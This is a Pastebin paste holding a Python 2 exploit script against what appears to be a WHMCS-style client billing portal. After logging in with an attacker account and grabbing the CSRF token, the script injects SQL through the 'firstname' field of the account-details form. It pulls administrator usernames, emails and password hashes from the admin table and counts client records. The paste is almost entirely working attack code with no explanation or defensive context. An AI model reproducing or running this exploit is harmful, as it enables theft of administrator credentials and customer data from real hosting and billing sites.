Advertisement
Guest User

Untitled

a guest
Jul 2nd, 2016
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.60 KB | None | 0 0
  1. url = 'http://clients.target.com/'
  2. user_email = 'mysuper@hacker.account'
  3. user_pwd = 'hacker'
  4.  
  5. import urllib, re, sys
  6. from urllib2 import Request, urlopen
  7. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  8.  
  9. def exploit(sql):
  10.     print "Doing stuff: %s" % sql
  11.     r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
  12.     return re.search(r'(id="firstname" value="(.*?)")', r).group(2)
  13.  
  14. def login():
  15.     print "Getting CSRF token"
  16.     r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
  17.     csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
  18.     cookie = r.info()['set-cookie'].split(';')[0]
  19.     print "Logging in"
  20.     r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
  21.     if 'dologin.php' in r:
  22.         sys.exit('Unable to login')
  23.     else:
  24.         return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]
  25.  
  26. user = login()
  27. print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')
  28. print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement